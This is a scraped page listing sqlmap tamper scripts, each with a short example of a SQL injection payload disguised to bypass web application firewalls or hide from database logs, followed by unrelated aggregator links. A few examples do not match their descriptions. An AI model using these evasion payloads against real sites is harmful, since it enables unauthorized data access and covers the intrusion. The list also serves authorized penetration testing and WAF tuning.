SQLMap Tamper Scripts Update

apostrophemask.py

Replaces apostrophe character with its UTF-8 full width counterpart

'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

apostrophenullencode.py

Replaces apostrophe character with its illegal double unicode counterpart

'1 AND %271%27=%271'

appendnullbyte.py

Appends encoded NULL byte character at the end of payload

'1 AND 1=1'

base64encode.py

Base64 all characters in a given payload

'MScgQU5EIFNMRUVQKDUpIw=='

between.py

Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'

'1 AND A NOT BETWEEN 0 AND B--'

bluecoat.py

Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator

'SELECT%09id FROM users where id LIKE 1'

chardoubleencode.py

Double url-encodes all characters in a given payload (not processing already encoded)

'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'

commalesslimit.py

Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'

''LIMIT 3 OFFSET 2''

commalessmid.py

Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'

'MID(VERSION() FROM 1 FOR 1)'

concat2concatws.py

Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'

'CONCAT_WS(MID(CHAR(0),0,0),1,2)'

charencode.py

Url-encodes all characters in a given payload (not processing already encoded)

'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'

charunicodeencode.py

Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)

'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'

equaltolike.py

Replaces all occurances of operator equal ('=') with operator 'LIKE'

'SELECT * FROM users WHERE id LIKE 1'

escapequotes.py

Slash escape quotes (' and ")

'1\\\\" AND SLEEP(5)#'

greatest.py

Replaces greater than operator ('>') with 'GREATEST' counterpart

'1 AND GREATEST(A,B+1)=A'

halfversionedmorekeywords.py

Adds versioned MySQL comment before each keyword

"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

ifnull2ifisnull.py

Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'

'IF(ISNULL(1),2,1)'

modsecurityversioned.py

Embraces complete query with versioned comment

'1 /*!30874AND 2>1*/--'

modsecurityzeroversioned.py

Embraces complete query with zero-versioned comment

'1 /*!00000AND 2>1*/--'

multiplespaces.py

Adds multiple spaces around SQL keywords

'1 UNION SELECT foobar'

nonrecursivereplacement.py

Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters

'1 UNIOUNIONN SELESELECTCT 2--'

percentage.py

Adds a percentage sign ('%') infront of each character

'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M%T%A%B%L%E'

overlongutf8.py

Converts all characters in a given payload (not processing already encoded)

'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1'

randomcase.py

Replaces each keyword character with random case value

'INseRt'

randomcomments.py

Add random comments to SQL keywords

'I/**/N/**/SERT'

securesphere.py

Appends special crafted string

"1 AND 1=1 and '0having'='0having'"

sp_password.py

Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

'1 AND 9227=9227-- sp_password'

space2comment.py

Replaces space character (' ') with comments '/**/'

'SELECT/**/id/**/FROM/**/users'

space2dash.py

Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')

'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

space2hash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227'

space2morehash.py

Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')

'1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227'

space2mssqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Eid%0DFROM%07users'

space2mssqlhash.py

Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')

'1%23%0AAND%23%0A9227=9227'

space2mysqlblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%A0id%0BFROM%0Cusers'

space2mysqldash.py

Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')

'1--%0AAND--%0A9227=9227'

space2plus.py

Replaces space character (' ') with plus ('+')

'SELECT+id+FROM+users'

space2randomblank.py

Replaces space character (' ') with a random blank character from a valid set of alternate characters

'SELECT%0Did%0DFROM%0Ausers'

symboliclogical.py

Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)

"1 %26%26 '1'='1"

unionalltounion.py

Replaces UNION ALL SELECT with UNION SELECT

'-1 UNION SELECT'

unmagicquotes.py

Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)

'1%bf%27 AND 1=1-- '

uppercase.py

Replaces each keyword character with upper case value

'INSERT'

varnish.py

Append a HTTP header 'X-originating-IP'

http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366

versionedkeywords.py

Encloses each non-function keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

versionedmorekeywords.py

Encloses each keyword with versioned MySQL comment

'1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#'

xforwardedfor.py

Append a fake HTTP header 'X-Forwarded-For'

' headers["X-Forwarded-For"]'

via

SQLMap Tamper Scripts Update 04/July/2016的更多相关文章

  1. Sqlmap Tamper大全(1)

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  2. 安全工具推荐之sqlmap tamper&sqlmap api

    我发现总有一些人喜欢问sqlmap的tamper脚本,问完工具问参数,问完参数问脚本...... 你这个问题问的水平就很艺术,让我一时不知从何说起...... 说一下在sqlmap的使用过程中,个人了 ...

  3. sqlmap tamper脚本

    本文来自:SQLmap tamper脚本注释, 更新了一些脚本,<<不断更新中>> 目前已经总共有50+的脚本,故对源文章进行更新... sqlmap-master ls -l ...

  4. sqlmap Tamper脚本编写

    sqlmap Tamper脚本编写 前言 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, Postg ...

  5. Sqlmap Tamper大全

    sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL.SQLMAP采用四 ...

  6. sqlmap tamper的使用

    前言 在早之前我对于tamper的使用一直都是停留在错误的思维.想着bypass,应该要先手动fuzz出规则来,然后再写成tamper使用. 直到今天,才察觉根本不需要一定要fuzz出具体的规则来,无 ...

  7. sqlmap tamper下模块的使用

    使用方法 根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化. sqlmap.py -u "http://www.target.com/test.php?id=12 ...

  8. sqlmap tamper编写

    #!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.or ...

  9. sqlmap tamper绕过安全狗

    可以过5.3版本 放出py #!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (ht ...

随机推荐

  1. Jmeter3.0发布,版本更新都更新了什么

    Jmeter已发布了3.0,一个大版本的开源测试工具,加入了一些新的特性及软件的改进. Jmeter已隔10年的大版本更新 这是在过去12年里jmeter第一个大版本的更新,jmeter 2.0版本发 ...

  2. js与java正则表达式处理字符串问题

    在编写处理字符串的程序或网页时,经常会有查找符合某些复杂规则的字符串的需要.正则表达式就是用于描述这些规则的工具.换句话说,正则表达式就是记录文本规则的代码.合理使用正则表达式确实会为程序员省去很多字 ...

  3. Threejs中的材质贴图

    最近项目需要折腾three.js,有关three.js几点说明 1.作用 threejs适合创建简单的模型视图 2.对于复杂的模型图(如:室内模型图)需要美术3D制作,前端导成特定格式文件(如*.mt ...

  4. CSS常用渐变

    边框渐变: border-image: -webkit-linear-gradient( red , blue) 30 30; border-image: -moz-linear-gradient( ...

  5. Position属性四个值:static、fixed、relative、absolute的区别和用法

    1.static(静态定位):默认值.没有定位,元素出现在正常的文档流中(如果设置 top, bottom, left, right, z-index这些属性就不起做作了). 2.relative(相 ...

  6. C#Excel文件加密实现,支持xlsx、docx、pptx(C#\Net\Asp.Net)

    从此刻开始,我已封闭!概不接客! 像风一样的男人,像风一样的性格,无拘无束,不拘一格.那么问题来了,当风遇到沙,不一定你是风儿,我是沙儿的缠缠绵绵,.也许是漫天黄沙,飞粒走石.如果我们期望擒住这漫天的 ...

  7. canvas学习之API整理笔记(二)

    前面我整理过一篇文章canvas学习之API整理笔记(一),从这篇文章我们已经可以基本了解到常用绘图的API.简单的变换和动画.而本篇文章的主要内容包括高级动画.像素操作.性能优化等知识点,讲解每个知 ...

  8. Dynamics CRM 之ADFS 使用 SQL Server 的联合服务器场

    此拓扑用于 Active Directory 联合身份验证服务 (AD FS) 不同于使用 Windows 内部数据库 (WID) 部署拓扑,因为不会将数据复制到每台联合服务器场中的联合身份验证服务器 ...

  9. 使用WebRTC搭建前端视频聊天室——点对点通信篇

    WebRTC给我们带来了浏览器中的视频.音频聊天体验.但个人认为,它最实用的特性莫过于DataChannel——在浏览器之间建立一个点对点的数据通道.在DataChannel之前,浏览器到浏览器的数据 ...

  10. swift学习笔记3——类、结构体、枚举

    之前学习swift时的个人笔记,根据github:the-swift-programming-language-in-chinese学习.总结,将重要的内容提取,加以理解后整理为学习笔记,方便以后查询 ...